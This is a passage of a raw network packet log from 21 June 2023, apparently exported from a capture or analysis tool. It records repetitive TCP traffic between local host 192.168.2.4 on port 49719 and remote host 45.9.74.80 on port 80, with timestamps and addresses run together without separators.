                                                                                                  Jun 21, 2023 20:24:11.633846998 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.633882046 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.633904934 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.633913040 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.633948088 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.633977890 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.634011030 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.634015083 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.634041071 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.634063005 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.634072065 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.634140015 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.634146929 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.634172916 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.634203911 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.634228945 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.634232998 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.634263992 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.634285927 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.634294033 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.634326935 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.634350061 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.641261101 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.641343117 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.641385078 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.641427994 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.641472101 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.641515017 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.641556025 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.641554117 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.641555071 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.641555071 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.641602993 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.641680956 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.641697884 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.641741991 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.641782999 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.641825914 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.641895056 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.650494099 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.650623083 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.650671959 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.650713921 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.650718927 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.650767088 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.650813103 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.650815010 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.650863886 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.650907040 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.650911093 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.650959015 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.651001930 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.651005983 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.651053905 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.651102066 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.651110888 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.651149035 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.651196957 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.651242018 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.651243925 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.651290894 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.651295900 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.651339054 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.651395082 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.651406050 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.651485920 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.651542902 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.651566029 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.651614904 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.651645899 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.651709080 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.651755095 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.651751995 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.651751995 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.651801109 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.651849031 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.651895046 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.651942015 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.651949883 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.651989937 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.652009964 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.652034998 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.652081013 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.652127028 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.652173042 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.652184963 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.652220011 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.652288914 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.652328014 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.652338028 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.652385950 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.652399063 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.652432919 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.652478933 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.652510881 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.652578115 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.652626991 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.652647972 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.652672052 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.652717113 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.652766943 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.652800083 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.652812004 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.652873993 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.659591913 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.659642935 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.659687996 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.659733057 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.659738064 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.659781933 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.659782887 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.659827948 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.659852982 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.659873009 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.659919977 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.659955025 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.659964085 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.660007954 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.660042048 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.660053015 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.660136938 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.660145044 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.660192013 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.660235882 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.660274982 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.660300016 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.660347939 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.660373926 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.660393000 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.660440922 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.660486937 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.660494089 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.660533905 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.660542011 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.660582066 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.660626888 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.660659075 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.660691023 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.660737038 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.660782099 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.660783052 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.660823107 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.660825968 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.660871029 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.660914898 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.660933971 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.660958052 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.660996914 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.661003113 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.661046982 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.661089897 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.661101103 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.661134958 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.661180019 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.661231041 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.661277056 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.661323071 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.661336899 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.661369085 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.661375046 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.661415100 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.661461115 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.661487103 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.661508083 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.661581993 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.661627054 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.661629915 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.661674976 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.661695957 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.661720991 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.661767960 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.661832094 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.667062044 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.667125940 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.667176008 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.667176962 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.667224884 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.667272091 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.667285919 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.667319059 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.667334080 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.667365074 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.667411089 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.667417049 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.667455912 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.667503119 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.667512894 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.667550087 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.667601109 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.667606115 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.678023100 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.678059101 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.678086996 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.678114891 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.678147078 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.678174973 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.678201914 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.678205967 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.678201914 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.678236008 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.678260088 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.678260088 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.678323030 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.678353071 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.678383112 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.678473949 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.678553104 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.678581953 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.678582907 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.678627014 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.678654909 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.678684950 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.678687096 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.678714991 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.678726912 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.678745031 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.678775072 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.678781033 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.678805113 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.678833961 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.678853989 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.678862095 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.678880930 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.678891897 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.678920984 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.678947926 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.678976059 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.678977013 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.679006100 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.679006100 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.679035902 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.679064989 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.679088116 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.679091930 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.679106951 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.679121971 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.679152012 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.679171085 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.679179907 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.679208994 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.679231882 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.679239988 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.679267883 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.679299116 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.679312944 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.679327011 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.679344893 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.679354906 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.679383993 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.679409981 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.679413080 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.679441929 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.679471970 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.679500103 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.679522991 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.679522991 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.679528952 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.679559946 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.679570913 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.686994076 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.687037945 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.687076092 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.687098980 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.687117100 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.687155008 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.687156916 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.687196970 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.687236071 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.687274933 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.687285900 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.687305927 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.687314034 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.687354088 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.687391996 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.687432051 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.687493086 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.687536001 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.687551975 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.687555075 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.687592030 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.687630892 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.687669039 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.687706947 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.687730074 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.687743902 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.687782049 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.687804937 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.687819004 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.687856913 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.687895060 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.687911987 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.687932014 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.687971115 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.687987089 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.688008070 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.688051939 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.688061953 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.688090086 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.688107967 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.688127995 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.688165903 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.688183069 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.688203096 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.688239098 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.688256025 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.688293934 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.688333035 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.688349009 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.688370943 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.688407898 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.688446045 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.688460112 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.688483000 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.688519955 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.688534975 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.688559055 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.688572884 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.688601017 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.688641071 CEST804971945.9.74.80192.168.2.4
